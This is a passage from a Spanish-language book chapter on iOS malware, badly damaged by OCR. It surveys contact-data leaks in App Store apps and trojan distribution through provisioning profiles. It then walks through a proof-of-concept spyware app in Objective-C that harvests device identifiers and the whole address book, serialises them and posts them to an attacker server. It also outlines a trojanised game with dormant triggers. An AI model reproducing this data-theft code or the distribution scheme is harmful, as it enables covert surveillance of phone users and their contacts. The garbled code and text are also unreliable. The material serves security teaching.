1251184712.839 1373 10.0.10.22 TCP_MI55/200 4013 GET http://static.storm8.com/vl/css 
Iglobal.css?v=147 - DIRECT/198,142.23.102 text/css 


1251184713,207 219 10.0.10.22 TCP_MIS5/200 640 SET http://static.storm8.com/vl/images 
/btnMedOg.png - DIRECT/198.142.23.102 image/png 


1251184714.023 1184 10.0.10.22 TC9_MISS/200 13737 GET http: //static.stormB.com/vl/images 
fago.png?v=147 - DIRECT/198.142.23.102 image/png 


Inside the actual data streams, you will see something similar to this: 


GET http://vl.stormB.com/points. phpiversion=1.528: 
udid=DedeSeb4df5b0CoB(947I8ad4Yaaec3ó1552041C0pf=62DE49A7A5A62418588976878B3EC3EAFE 
fpts=102pnum=0414%20610%20500Emodel=iPhonet$ 


Host: vi.storm8.com 


User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 
(KHTML, like Gecko) Mobile/74341 


Accept: application/xmi,apolication/xhtml=xml,sext/html;q=0.9,text/plain;q=0.8,image/png,* 
159=0.5 
Accept-Language: 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Proxy-Connection: keep-alive 


Imagen 07.02: Log de la aplica 


n Vampires Lives de la empresa Síorms. 


Path, Twitter y otras apps socials 

Aquí no acaba la cosa, otro caso conocido fue el de Path. El investigador Arun Tamphi, intentando 
realizar un port de la app a OS X, usó un proxy para ver las peticiones a la API, y descubrió, que la 
app enviaba todos los datos de la agenda a los servidores de Path, sin permiso previo del usuario. 
Las siguientes imagenes son una captura de la petición que realizaba Path a los servidores: 


2012-02-08 01:24:31 POST https://api .path.com/3/contacts/add 
<- 208 application/x-plist, 558 


epí.path, com 
Path/2.6.5 CFNetwork/548.0.4 Dorwin/11. 


Tmagen 07.03: Peución de Path que enviaba todos los datos de la agenda de contucios a los servers. (Parto 1D. 
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;-2E48D9FAGSESContent-Dispesitian: form-data; name=" dia Content- 
CARR ATOS A '.a.1.6. 


Imagen 07.03: Petición de Path que enviaba todos los datos de la agenda de contactos a los servers, (Parte 2), 


la lista continúa, ya que incluso grandes como Twitrer, también se han visto envueltos en escándalos 
imilares con el tema de los contactos, debido a que cuando los usuarios utilizaban la opción buscar 
tigos, sus contactos pasaban a ser de Twiter durante 18 meses. A continuación se muestra una 
tura de la opción en la app de iOS: 


Bean your Contacts for puople you already 
know oo Twitter. 


Imagen 07.04: Opción de “Buscar amigos” que enviaba los contactos a 7er. 


Además muchas empresas, como Viber, FourSquare, Instagram, Hipster, han tenido problemas 
Similares. Para finalizar este punlo, simplemente decir, que en la mayoria de los casos presentados 
anteriormente y para colmo, los datos se enviaban sin cifrar, lo que deja claro que los controles de 
la App Store no son perfectos. 


Un malware dirigido por la App Store: InstaStock 


Sin embargo, la prueba más importante de que se puede hacer un ataque de malware a través de la 
App Store lo hizo el investigador Charlie Miller, quien consiguió introducir una app con funciones 
de dropper que descargaba software malicioso desde Internet sin pasar por la firma de Apple. 


No obstante, la mejor forma de utilizar la App Store para hacer un software malicioso sería crear 
un software adictivo y recomendable (por ejemplo un juego que luvicra un coste), que pudiera ser 
regalado a las personas que se quiera troyanizar. y que tenga funciones dormidas que solo se activen 
en determinadas circunstancias, como por ejemplo con un determinado UDID o cuando llegue un 
mensaje oculto, por ejemplo, por medio de una imagen con esteganografía cargada desde Internet. 


Por supuesto, este sería un ataque costoso, pero visto los casos de Find And Call. InstaStock o las 
aplicaciones sociales, es más que factible poder realizarlo. 
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InstaStock 


Add a Ticker 


1 10:25am 
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Imagen 07.05: InstaStock. 


3. Troyanos sin AppStore 


No solo es posible distribuir aplicaciones a terminales ¿Phone o ¿Pad pasando por la App Store, 
software de espionaje muy popular como /inSpy, utiliza estos sistemas para troyanizar terminal 
iPhone. La idi muy sencilla, consiste en convencer al usuario de que instale una aplicación 
que se ha distribuido utilizando un provisioning profile. es decir. un certificado de despliegue de 
aplicaciones generado a partir de un certificado de desarrollador oficial Apple que permite instalar 
una app concreta en un dispositivo concreto, este es el proceso para construir un malware en este 
entorno, 


Troyanos con Provisioning Profiles 

Es un tema de sobra conocido en la comunidad, tanto por los investigadores de seguridad, como 
por algunos desarrolladores o administradores de flotas de dispositivos a nivel corporativo, que es 
posible instalar una aplicación iOS, (es decir un fichero con extensión ipa), en un dispositivo ¡OS, 
creando un perfil específico para dicho dispositivo. De csta forma tan simple se podrán, instalar 
aplicaciones no firmadas por Apple. 


Capítulo VII. Malware en iOS | 131 | 


Este es el método utilizado por los desarrolladores para distribuir el software que están desarrollando 
a un grupo de fesrers. Los desarrolladores que pagan la licencia ($0 €/año) y forman parte del 
Programa de Desarrollo de iOS, tienen tres formas de distribuir sus creaciones. La primera es a 
través de la 4pp Store, la segunda ofreccrlas directamente a empresas, y la tercera la que se denomina 
Ad-Hoc Distribution. 


Es esta última opción, la que los desarrolladores utilizan para testear sus apps, ya que este método 
permite compartir una app con hasta cien dispositivos, bien a través de correo electrónico, o bien 
subiéndola a un servidor. Para ello es necesario, acompañar la aplicación o „ipa, de un Perfil de 
Aprovisionamiento (Provisioning profile), también conocidos como Perfiles de Datos, ya que 
permiten la instalación de software en el dispositivo, mientras que hay otro tipo de perfiles, que son 
los Perfiles de Configuración, y que se utilizan a nivel corporativo con un sistema MDM (Mobile 
Device Management), para configurar y gestionar una flota de dispositivos iOS. 


Existen varios tipos de Provisioning profile, como puede ser de desarrollo, de distribución, de 
distribución corporativa, y cada uno de ellos tiene características diferentes, pero para la prueba de 
concepto, lo ideal es utilizar un Perfil de Distribución (Distribution Provisioning profile). Un perfil 
de distribución se compone de un nombre, de un conjunto de certificados de desarrollador, de una 
lista de identificadores de dispositivo (UDID), y de un identificador de aplicación (4pp ID). 


Dicho todo esto, queda claro que, teniendo una licencia de desarrollo, y sabiendo el identificador 
de dispositivo UDID, se puede crear un perfil de aprovisionamiento que permita instalar software 
sin firmar por Apple. 


Construyendo un malware 


Llega el momento de realizar la prueba de concepto de cómo implementar un malware en ¡OS. Esta 
prueba de concepto se basa en fugas de datos confidenciales, al igual que ha ocurrido históricamente 
en varias apps existentes en la App Store, mencionadas anteriormente. En concreto el robo de la 
agenda de contactos o de identificadores únicos del dispositivo, como UDID, IMEI, etcétera. 


La idea de esta prueba de concepto, es desarrollar una aplicación que acceda a este tipo de datos, y 
que sean enviados a un servidor (HTTP End Point), previamente montado y configurado para recibir 
y almacenar en fichero o en una base de datos. la información enviada por cada dispositivo en el que 
se ejecute este malware. 


Para el desarrollo de esta POC, es necesario por un lado el desarrollo, tanto de la aplicación cliente 
en ¡OS, en donde se realiza el robo de datos. como la aplicación web o servidor, a donde se envían 
los datos sustraídos. Además, y una vez que todo el sistema está implementado, hay que realizar la 
distribución de la aplicación, pero eso se detalla en el siguiente apartado. 
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Client side (¡0S) 

Como dirían en algún buen blog de programación 10S, “Show me the cade!”. Es el momento de ver 
como implementar el código que accede a esos codiciados datos confidenciales, como pueden ser 
UDID, IMEI, etcétera, o a los datos de la agenda de contactos. Se va a dividir en tres apartados, el 
primero acerca de identificadores únicos de dispositivo, el segundo apartado acerca de la agenda de 
contactos, y el tercer y último apartado sobre cl envío de los datos a un servidor malicioso. 


Identificadores únicos 


Los identificadores únicos son o han sido muy utilizados por los desarrolladores o empresas, para 
identificar a los usuarios de sus aplicaciones. y así poder ofrecerles publicidad, ofertas, y de csta 
manera obtienen la posibilidad. no solo de desarrollar sus campañas de marketing, sino de ofrecerle 
al usuario buscar amigos, conocidos, y en general establecer redes de contactos, que aumenten la 


experiencia de usuario, y por tanto la satisfacción de estos, y probablemente el número de descargas. 


De hecho, de ahí provienen muchas de las fugus de datos conocidas (algunas de ellas presentadas 
anteriormente). Y hasta que no se han presentado demandas colectivas, o Apple decide intervenir, 
parece que las empresas no comienzan a dejar de lado estas malas prácticas. Y es que Apple, durante 
el año 2012 ha estado avisando a los desarrolladores que se alejasen de estas prácticas, y finalmente 
ha comenzado a rechazar apps que hagan uso del UDID. o que intenten enviarlo a sus servidores. 


A continuación un correo de Apple rechazando una app de la compañía ZapBors por hacer uso de 
estas prácticas: 


Rajectad Mar 28, 2012 09:11 PM 

Reasons for Rejection: 

17.1: Apps cannot transmit data about a user without obtaining te user's prior permission and providing the user with 
access to information about how and where the data wil be used 


Mar 28, 2012 09:11 PM. From Asoie. | 
m 


We found your app dons ner obtain user coment belone collacing fhair personal data. as reaus rac by Ye Apo Stoca Review 
Guidelines. 


Specifically, UDI data a seve ad the sushtapbots.com checks with thair service. 


| 
e MA 


Ur v0OT=TOLQOACA ¡0 a Phaea SAC SASA Pomen Maa» Anguita picailon unguage-Engintappicroon j 


To collect personal uses data with your spp, yau must maka it zaar to the uyer thst their personal user dala wi be uploaded to yoar 
rue and you must obtain the user coment belare tha data is uploaded 


Imagen 07.06: Correo de Apple rechazando una aplicación de TapBors que have uso del UDID. 


A partir del momento en que Apple comienza a rechazar apps, se empieza a ver en foros y webs de 
programación, como los desarrolladores intentan cambiar los métodos o técnicas para identificar a 
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s usuarios de manera univoca, es decir implementar lo que se conoce como “tracking”, utilizando 
nicas un poco más refinadas que simplemente utilizar el UDID. 


gunos programadores o empresas incluso han publicado sus propios desarrollos para continuar el 
'guimiento o tracking de los usuarios, una vez que Apple ha establecido como “deprecated” el uso 
1 UDID, como por ejemplo: 


-  OpenUDID: Proyecto iniciado por Yann Lechelle (cofundador de Apps/'ire). y al que 
se han ido incorporando muchos colaboradores, empresas, e incluso sc ha portado a otros 


sistemas operativos, La web oficial del proyecto está situada en github: UBAGO 


- OL Otro proyecto, con algunas diferencias respecto al anterior, pero en líncas 
generales con el mismo objetivo. La web oficial del proyecto de crashlytics es la siguiente: 
apio la web del proyecto en sito: Mai /gaB comicas) 


A continuación una pequeña comparativa de estas alternativas al clásico UDID: 


Cross- 
‘oriiicaton 


Distinguish 
devices. 


Iuugen 07.07: Comparativa de allemativas al clásico UDID. 


Como se puede comprobar echando un vistazo a estos proyectos, comienzan a aparecer alternativas 
más robustas, que el simple uso del UDID, Se ven có: ¡gos más serios (tanto en estos proyectos, 
como en otras alternalivas propuestas por desarrolladores en los foros como stackoverflow), en los 
que se puede encontrar el uso de cifrados, hashes, semillas. vectores de inicialización, y en general 
algoritmos de generación de identificadores únicos que no dependan de datos confidenciales, o de un 
usuario/contraseña, y que además se envíen cifrados, . 
más serio, cstable y seguro. 


En fin, como se decía anteriormente, algo 


Y después de esta pequeña introducción al mundo de los identificadores únicos, y como se dijo al 
principio del apariado, es hora de mostrar el código. A continuación se muestra un método en el que 
accede a diferentes identificadores únicos del dispositivo: 
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- (void) readUniqueldentifiers { 
NSLog AAA) y 
NSLog(G"Readirg device's ids..."); 


NSString »uvidString = nil; 

CFUUIDRef uuid = CFUUIDCreate(NULL); 

if (uuid) { 
//uuidString = (_bridge NSString +)CFUUIOCreateString(NULL, wuid); 
uuidString = (NSString *)CFUUIDCreateString(NULL, uuid); 
CFRelease(uuid); 


Y 
NsLog(e"UDID with CF classes is: %8"uuidString); 


11 Classic method. 
NSString wudid = [[Uldevice currentDevice] uniqueldentifier]; 
NSLog(@"UDID is: AG",udid); 


// Alternative 1 (NSUUID class). 
NsString «udid1 = [INSUUVID UUID] ULIDStringl; 
NSLog(e"NSUUID is: 46" udid1); 


// Alternative 2 (Uldevice class). 


NSString +udid2 = | [UlDevice marrentorviee], ¡enterada 
NSLogle"Identified tor vendor is: %e",ud 


// Atternative 3 (ASIdentifierManager class, requires AdSupport framework): 
NSUUID *UUID = [[ASIdentifierMenager sharedManager] advertisingldentifier]; 
NsString +udid3 = [UUID VUIOString); 

NSLog(6"Advertísing identifier is: M”,udid3); 


NSI og A rr) 
l NSLogle"\nin"); 


Imagen 07 08: Método implementado para acceder u identificadores únicos de dispositivo. 


Para utilizar este método, el único requisito previo, será importar el framework AdSupport, para poder 
utilizar la alternativa 3, en la que se accede al identificador relacionado con temas de publicidad o 
el uso de la plataforma ¡Advertisement. Una vez que se ejecute el código se obtendrá un resultado 
similar al que se puede apreciar en la siguiente captura: 


Reading device's ids... 
Uoro with CF classes is: 19CD4568-E7B3-4146-B7AC-A7D460F0F3F5 
UDID is: Tadde7ed208452728f9467c7401c789200009000. 


NSUUID is: 627B0E70-DE1D-4998-881C-313329A9ADDG 

Identified for vendor is: <_NSConcretelWID 0x849aa40> 20235D55-2E77-4M48-2450-BEDOS44D6686 
Advertising identifier is: 56F3E34B-A52C-4E7A-84CA-B912BA2E418B 
a 


Imagen 07.09: Salida por consola del método que extrae varios identificadores únicos de dispositivo. 


Estos identificadores se han obtenido con el Simulador de iPhone de Xcode, pero se pueden extraer 
los mismos datos de un dispositivo real. 
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ding device's ids. 
ID with CF classes is: 10976B95-B15C-4440-B898-3F33891D3086 
is: 1a2775699028c473c1e914fdbcf8c3G80b350267 
45095329-9933-4736-89E3-CESCDAFO6958 
ified for vendor is: < NSConcreteUUID 0x1F876950> 7158F49C-6177-40EE-8084-SAUBFSECEBE2Z 
rtising identifier is: 38709285-6194-475D-BASE-969743D3CB5C 
Ea o > mi a > Pi o 


Imagen 07.10: 5 


lida por consola con un ¿Phone 48. 


último cabe decir, que existe otra opción para realizar el tracking, y es la de utilizar el nuevo 
[D, pero como se comentado en la comunidad ¡OS, no es del todo una buena opción, ya que solo 
tifica una instancia de la aplicación, y no al dispositivo, por lo que en caso de eliminar la app, y 
instalarla de nuevo no hay forma de enlazarla o mantener el seguimiento (tracking). 


Address Book 


¡ora loca ver qué opciones propone Apple a los desarrolladores para acceder a los datos del 
dispositivo. Lin esta prueba de concepto se ha desarrollado un código que accede a la agenda 
de contactos, además de acceder a los identificadores únicos, y posteriormente se envía toda la 
formación a un servidor malicioso. 


Se podría profundizar en detalles de como funciona el framework que Apple pone a disposición de 
os desarrolladores para trabajar con la agenda de contactos, llamado. pero 
Esto no es un libro de desarrollo, por lo que se centra simplemente en como robar los datos como 
eba de concepto y nada más. Aquí solo se va a explicar el código implementado, más que todo el 
¡cionamiento del framework. Para aquellos que deseen profundizar en este framework, en la web 


bficial de Apple, está disponible toda la documentación sobre el framework AddressBuviie incluso 


jemplos para su mejor comprensión. 


El primer paso, como siempre a la hora de trabajar con un nuevo. framework, es importarlo, por el 
método tradicional. Se selecciona el proyecto en Xcode, se selecciona el target y luego se hace cl 
el menú Build Phases > Link Binary With Libraries, se le da a el botón +, y se busca cl framework 
eado. Además, hay que importar el framework en la clase que se desee utilizar, utilizando el 
ico Himport <AddressBook/AddressBook.h> 


segundo paso, es comenzar a escribir cl código de nuestra aplicación iOS, que acceda a la 
genda de contactos, y para ello, lo primero será comprobar si el usuario ha concedido permiso a la 
plicación para acceder a la agenda. Esto tan solo ocurre desde ¡OS 6, que ha sido cuando Apple ha 

mentado la granularidad, en el control que los usuarios tienen sobre los permisos que conceden 
las aplicaciones que instalan, de manera, que se solicita permiso al usuario, cuando la app intenta 
Eceder a los contactos. 


to se aprecia en la siguiente captura: 
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Imagen 07.11: Solicitud de autorización de una app ¿OS para acceder u los contactos. 


Esto no está nada mal para la tranquilidad de los usuarios. y más teniendo en cuenta los casos de 
robos de datos que se han presentado anteriormente. Pero a la hora de hackear o robar datos, la cosa 
se complica, ya que si el código del malware o troyano intenta acceder a la agenda de contactos, 
se solicitará al usuario autorización para dicho acceso, aunque solamente en caso de que tenga 
instalado ¿OS 6. 


Y ahora el momento de ver el código que chequea si el usuario ha concedido permiso a la aplicación 
para acceder a la agenda de contactos: 


- (voia) scanas € 


1/ Request nuthorization to Address Book 
//MBAcdressBookRef addressBook = ABAcdresslookCreste(): // Deprecated!!! 
ABAddressEcokef acdressBookñef = ABAddressB0okCresteNit Opticas (NULL, NUL: 


AT (ABAddressBookGetauthorizationStatus![) == kABAUthorizetzonStatusNotdetermined) { 
ARSddressBookReques tAccessWithCompLetion(addressBuukRel, “(bool grantec, CFErrorRet errer) 
ye access has been granted. 
t time access has been granted"); 


[self readaddressiook:acdressiocktet); 
H: 


3 

else if (ABAdCressBookGetAuthorizationstatus() == kARAuthorizationStatasauthorized) 4 
Z1 The user has previously access. 
NSLog(@"Status Authorized! Li"); 
[self rencaddressBook:oddressBooknot]; 


1 

else if (ABAdcresstookGetauthorizarionstatus() == kaAutharizationstatusnenied) 1 
gasa 

{æ"Status Denied! !!*); 


+ 

else if (ABAdoressBookGetaurhorizarionstatus() == kAAuthorizationStatusRestricted) 4 
TE nre 
NSLagig'Status Restrictedit!"); 


x 
else { 


19 User Lo change privacy setting in settings 
Nstoglg"Access to Addressñnok has been denied for this ass. Go Lo Gereral Settings to change privacy settings! : 1“) 


Imagen 07.12: Código para chequear si el usuario ha concedido permiso a la app. 
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in ¡OS 6 ha habido algún cambio y se ha quedado obsoleto algún método, pero el funcionamiento 
igue siendo prácticamente igual. Sin entrar mucho en detalles, el código está cribando todos los 
sibles estados de permisos en que se encuentra la aplicación, y en caso de que se haya autorizado, 
tonces se hace una llamada a otro método llamado readAddressBook, que es el que realmente lee 
s datos de los contactos. A este método se le pasa la referencia a la agenda de contactos, creada en 
primera línea de código de este método. A continuación se presenta el código de dicho método: 


Tvoid) readaddressBook: (ADAddressBookRef)addressbook Y 


A A A) ; 
NSLog(@"Reading Address Book..."); 
NSLogla"\n"); 


// Initializations... 

NSUInteger 4; 

NSUInteger j; 

Nsulnteger k; 

NSMutableDictionary +address8ookDict = [[NSMutableDictionary alloc] initl; 
NsMutableArray saddressBookArray; 


// Starting to extract data from ab. 
NSArray speople = (NSArray +) ABAddressBookCopyArray0fALldeopLe(addressBo0k); 


it ( people—nit ) 


NsLog(0"There's no contacts in address book to scan! t 
CrRelease(addressiook); 
return; 


cl ( £=0; i<[people countl; i++ ) 
addressBookArray - [INSMutableArray alloclínitl; 
AbrecordRef person - (ABRecordRef) [people objectAtindex: i]; 
NSLog(6""———PHONE ENTRY: 
11 First Mame. 
NSString firstname = (NSString =) ABRecordCopyYaLuelperson, kABPersonFirstNameProperty); 
NsLog(6"First name: sa", firstname); 
it (firstname I= nil) 4 
$ [addressBookArray add0bject:fárstnamel; 


[firstnane release]; 


// Last Nane, 

poro alestname = (NSString =) ABRecoriCopyValue(person, kABPersonLastNameProperty); 
NSLog lQ" s 

it (lasi 
7 [addressBookArray add0bject: 


[lastname releasel; 
11 Emils. 


NSString semaíls = (NSString +) ABRecordCopyValue(person, kABPersonEnailProperty); 
CFIndex emailsCount = ABMultiValuecetCount( emails ); 


astnamel ; = 


for (3-0; jcemallsCount; je» ) 4 
CFStringRef emaslValue = ABMultiValueCopyValueAtIndex( emails, j); 
NsLog(e"Email: *8",emailValue); 
if (emailValue i= nil) 4 
4 laddressBookArray addObjects (NSString #)enaiWalue]; 


CFRelease(enailValue) ; 


Imagen 07.13: Primera parte del código del método read4ddressBook, que lee la agenda de contactos. 
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JE Phone Numbers. 
ABMutabieMultiValueñeí phoneNumbers - ABRecorcCopyYalue(person, kABPersonPhoneProperty); 
Crindex phoneNumberCount = ABMuLtivaluecetCount[ phonelumbers ); 


For ( k=ð; k<phoneMimberCount; kee ) 
4 
CFStringRef phoneNurberLabel = ABMultiValueCopyLabelAtIndex[ phoneNumbers, k ); 
CFStringRef phoneunbervalue = ASMuTtiValueCopyvalueatIndex[ phonelumbers, k ); 
CFStringhe? phoneNumberLocalizcdLabel = ABAddressBookCopylocalizedLabell phoneNumberLabel ); 
to "mobile" 


/1 Find the numbers of one person. 

Nsstring +completephone = [LINSStringa)phonelumborlocalizrdl abel stringByAppendingString:8" 
stringByAppendingSt ring: (NSStr ingw) phoneNumberVa Luel; 

NSLog(8"Complete phone: 48", conpletePhone) ; 

if (completePhone I= mil) 4 

y UHiressocokarray adc0bject:completePhonel; 


CFRelease(phoneNumberl ocolizrdLabel); 
CFRe lease (phoneNumber Label); 
CFHelease(phoneNumberVvalue); 


y 
NSLogla"\n"); 


17 ħdó array with addressbook cata to the dictionar, with iterator as key, 
[addressdookDict setObject:mddressBookarray forkey: ÍNSString stringwithFormat:@"mi", il); 


Ji Release array, ìn order to clean Tor next iteration. 
addressBookArray = ail; 
InddressookArray releasel; 

+ pe 


[people release); 
CFRelease(addressBook); 


NS A A o e) 
NsLog(Enmn"); 

//NSLog(8"Imprimiendo array acdress book: A8",addressdookArray); 

NsLog(0"Imprimiendo dictionary address book: Ae",addressBookDÍcT); 


J} Parse dictionary Lo json data, in order to prepare data to send it, 
NsData *jsondata = [self parseardiccionarioEnDazosJ50N:addressDookDict]:; 


// Invoke method to send data to server. 
Lan £ sendOntas isonMatal; 


Imagen 07.14: Segunda parte del código del método readAddressBook, que lee la agenda de contactos. 


El código comienza inicializando las variables requeridas, y creando una instancia en la que se 
almacena una copia de toda la agenda de contactos, que posteriormente y con bucles for, se irá 
recorriendo y se irán volcando los datos deseados. En-este caso, para cada entrada en la agenda, se 
han extraído el nombre, el apellido, todos los emails asociados a una persona, y todos sus teléfonos. 
Se podrían haber extraído más datos, pero como prucba de conecpto se considera suficiente. 


Durante la extracción de los datos, se comprueba la existencia de cada campo, es decir, que sca 
distinto de nil, y en ese caso, se almacena el dato en un diccionario, ya que luego habrá que pasar 
los datos al formato JSON. para su posterior envío al servidor malicioso, y es que este formato 
proporciona facilidad a la hora de manejar los datos, y rapidez a la hora de transmitirlos. 


Durante el código, existen varias líneas que utilizan NSLog, para ir mostrando por consola los 
resultados. Evidentemente estos logs son para mostrar los resultados de la POC, pero se podrian 
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eliminar en un caso real. Los resultados por consola, muestran que los datos de la agenda se están 
extrayendo correctamente, tal y como se puede apreciar a continuación: 


10:24:46.729 i64_saluare[996:c07] e rc 
2013-91-11 10:24:46.730 161 naluere[996:c07] Reading Address Book... 
2013-01-11 10:24:46.739 i64 naluare[996:c97] 
2013-01-11 10:24:46.732 i64_maluare[996:c07] —-PHONE ENTRY: 
2013-01-11 10:24:46.733 164 neluare[996:c97] First name: Kate 
2013-01-11 10:24: 45.734 164 naluere[996:c07] Last name: Bell 
2013-91-11 10:24:46.735 164_noluare[996:c97] Enmil: kato-bellguac.com 
2013-01-11 10:24:46.736 154 neluare[996:c07] Email: wew.crestive-consulting-inc.com 
[2013-01-11 10:24:46.765 164_naluars[996:c87] Completa phone: mobila->(555) 564-8583 

46.765 154_naluare[996:c07] Complete phone: main->(418) 555-3695 
[2013-01-11 10:24:46.768 164 moluare[996:c97] 
[2013-01-11 10:24:46.769 161_naluare[998:c87] ——-PHONE ENTRY: 
[2013-01-11 10:24:46.779 164 _aslware[996:c07] First name: Daniel 
2013-01-11 10:24:46.770 164_noluore[96:c07] Last maza: Higgins 
[2013-01-11 10:24:46.771 164_aoluare[996:c07] Email: d-higginsgeac.com 
[2013-01-11 10:24:46.772 164 maluare[996:c07] Complete phone: hone->555-478-7672 
[2013-01-11 18:24:46.772 164_asluare[996:c87] Complete phone: mobile->(408) 439-5270 
[2013-01-11 10:24:46.773 164_naluare[996:c07] Complete phone: hone fax->(498) 555-3514 
2013-01-11 10:24:46.773 164_noluere[996:c97] 
[2013-01-11 10:24:46.774 i6d_aalunre[996:c07] —-PHONE ENTRY: 
2013-01-11 10:24:46.774 i64_maluare[996:c07] First name: John 
2013-01-11 10:24:46.775 164 _anlwarm[996:c07] Last nama: Appleseed 
[2013-01-11 10:24:46.776 i64_malware[996:c07] Email; John-Appleseedënsc. con 
2013-01-11 10:24:46.776 164 maluare[996:c07] Complete phone; mobile=>880-555-5512 
2013-01-11 10:24:46.777 184_naluare[996:c07] Complete phona: hone->888-555-1212 
2013-01-11 10:24:46.777 164_naluara[996:c87] 
[2013-01-11 10:24:46.778 i64_matware[996:c07] ——-PHONE ENTRY: 
[2013-01-11 10:24:46.778 i64_maluara[996:c07] First nane: Anna 
2013-01-11 10:24:46.779 i64 malware[996:c07] Last nase: Haro 
[2013-01-11 10:24:46.779 i64_maluara[996:c07] Email: anna-harogaac. com 
[2013-01-11 19:24:46.780 i64_malware[996:c07] Complete phone: home->555-522-8243 
[2813-01-11 10:24:46.781 164 matware[996:c07] 
[2013-01-11 19:24:46.781 164 molunre[996:c07] —-PHONE ENTRY: 
[2013-01-11 10:24:46.782 i64 malware[996:c07] First nane: Kank 
2013-01-11 10:24:46.782 i64_matwara[996:c07] Last nasa: Zakroft 
[2013-01-11 19:24:46.783 164 malware[996:c07] Email: hank-zakrotf@nac. con 
[2013-01-11 19:24:46.783 i64 malware[996:c07] Complete phone: work->(555) 766-4823 
[2013-01-11 10:24:46.784 154_aalmaru[996:c87] Complate phono: othar->(707) 555-1854 
[2013-01-11 10:24:46.784 i64 palware[S96:c07) 

—— PHONE ENTRY: 


2013-01-11 
[2013-01-11 First nano: David 
Last nase: Taylor 
Cosplete phone: hone=>555-619-6679 


rra 


Imagen 07.15: Logs de la app, en el que se mucstra la extracción de los datos de la agenda. 


ir que los datos mostrados en la captura anterior, han sido extraídos de un iPhone Simulator, por 
que no son reales, pero se ha hecho la prueba y funciona-correctamente con un dispositivo real, 
trayendo todos los datos de los contactos, que por razones obvias no se presentan aquí. 


| final de este método, hay un par de líneas de código, que son las que convierten los datos en JSON 
los envían al servidor, invocando a un par de métodos propios, que implementan dichas tareas y 
¡e se presentan a continuación en más detalle. 


vío al server 


enviar los datos al servidor malicioso y que este almacene, ya sea en fichero o en base de datos, 
los los datos extraídos de la agenda de contactos, asociados a los identificadores únicos, para 
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saber en todo momento de qué disposi 
convertir los datos a JSON. 


ro se ha robado cada agenda de contactos, lo primero será 


Para ello se hará uso de alguna de las clases que proporciona el SDK de ¡OS para trabajar con dicho 
formato, como es NS/SONSerialization, como se aprecia en la siguiente figura: 


$ pragma mark = ¿son methods 


— (NSData +) parseardiccionarioE1DatosISON: (NSDictionary =diccionarioJsoN 
í 
11 Se crea una vble para controlar los posibles errores. 
autoreleasirg NSErrore error = nil; 


MSDala wjsonData = INSISONSerialization datawztruSoNobject=diccionarioJS0N options:kNilūptions error:&error];| 


at (error t- niU 4 
error = ni 
return nil; 


error = nit; 
return Jsonðata; 


Imagen 07.16: Código del método que convierte los datos de diccionario a JSON, 


Este método simplemente recoge por parámetro un diccionario con datos, y lo devuelve serializado 
en formato JSON, además almacenado en una estructura de tipo NSData, perfecto para transmitirlo 
por la red. Los datos que almacena el diccionario son arrays con el conjunto de datos de cada 
contacto, a los que se accede por llave, que en este caso es simplemente un número que actúa a 
modo de índice. 


A continuación se muestra el aspecto que tiene el diccionario de datos, antes de transformarlo a 
JSON: 


[2013-01-11 12:38:18.548 16%_nalware[2472:c07] Imprimiendo dictionary address book: [ 
o= t 


"kate-bellgmac. con", 

"wi, creative-consulting-inc. con", 
"mobile->(555) 564-3583", 
"main->(415) 555-3695" 


home->555-478-7672 
"mobile->(408) 439-5270", 
"home fax->(488] 555-3514" 


di 

Sa i 
John, 
Appleseed, 


"Jchn-Appleseedemac.com”, 
"mobile->888-555-5512", 
"home->888-555-1212" 


Imagen 07.17: Aspecto de los datos antes de convertirlos a formato JSON (Parte 1). 
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"hank-zakrofíguac cam" 
"mork->(555) 766-4823" 


Imagen 07.17: Aspecto de los tes de convertirlos a formato JSON (Parto 2). 


tuando se ha ejecutado el método que sertaliza y transforma los datos a JSON, estos se almacen 
en la estructura NSData, los datos adquieren el aspecto que se muestra en la siguiente captura: 


(2013-01-11 13:51:43.979 164_nolware[2823:c07] Probando valor de jsondata: <76223322 3a5b2241 SÓb6122 
[2c224961 72Gf222c 22G1Ge50 G12d6361 72614064 61632063 6f6d222c 22688166 32343322 
[542c2231 223a5b22 44616e69 G5Gc222c 22486967 67696e73 222c2264 24685967 ld 22202268 
24373637 32222c22 GGGf6269 6c652d3e 28343038 29203433 22686f6d 
20353535 24333531 34225d2c 2234223a 5b224861 606b222c 22202208 
64616320 6266422 20227761 726b2d3e 28353535 29203736 36243438 3233222c 22617468 
35243138 3534225d 2c223222 3a5b224a 6686022 2c224170 706c0572 65656422 2c224a6f 
ADGA6163 2a636f6d 222c226d GP62606c ES2d3e38 30382035 35352435 35313222 2c22006f 
31323132 225d2c22 30223a5b 224b6174 55222022 42656060 222c226b 61746524 62656c6c 
77712083 72656174 59768524 636f8073 755c7459 G0672d69 60632063 6f6d222c 22646162 
35383322 2c226d61 €960Zd30 28343138 20203535 39352254 20223522 
32272022 686t6d65 24303535 35243631 30243636 Er 


Imagen 07.18; Datos preparados para enviar al servidor malicioso. 


Una vez que se tienen los datos en el formato correcto para su envío, se invoca a otro método al 
que se le pasan dichos datos por parámetro, y es este método el que establece una conexión con 
el servidor y envía los datos. En la imagen 06.19 de la página siguiente se muestra el código del 
método de envío, llamado sendData: 


Fste método crea una conexión con el servidor remoto malicioso, que en este caso, y como prucba 
de concepto, es la propia máquina en la que se está desarrollando la POC, que es un MacBook Pro, 
en el que está instalado el entorno de desarrollo ¿OS (Xcode), y un servidor MAMP Pro para alojar 


la aplicación web. Por tanto la conexión apunta a localhost, pero podría apuntar a la URL deseada. 


Para crear la conexión existen multitud de opciones diferentes, frameworks, APIs, clases de Apple 
o de terceros, opensource, de pago, etcétera. En este caso se ha utilizado la clásica clase de Apple 
NSURLCommeetion., a la que basta con pasarle un request previamente configurado. precisamente 
lo que se hace es configurar los diferentes parámetros de dicho request, como puede ser el tipo de 
petición o envío (en este caso es por POST), concatenar los datos con el parámetro, indicar el tamaño 
de los datos a enviar. el tipo de codificación (UTF-8), etcétera. 
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= (vo1J) senddata: (NSData >]dataToSend Y 


// Create server URL, 
NSURL amyURL = [NSURL URLMithString:8"http://12 1:8888/addressbook/incex. php?"]; 


11 Create request. 
NSMutableURLRequest «request = INSMutaoleURLRequest requestWithURL:myURL 
CachePolicy:NSURLRequestliseProtocolCachePol icy 
timeoutinterval:68.01; 


4 Contigure request. 
[request setHTTPMethod:@"POST"] ; 


AsString; paranString = g"paran="; 


NSString mjsonString = [NSString alloc] initwithData:dataToSend encoding:NSUTFBStringEncoding) ; 


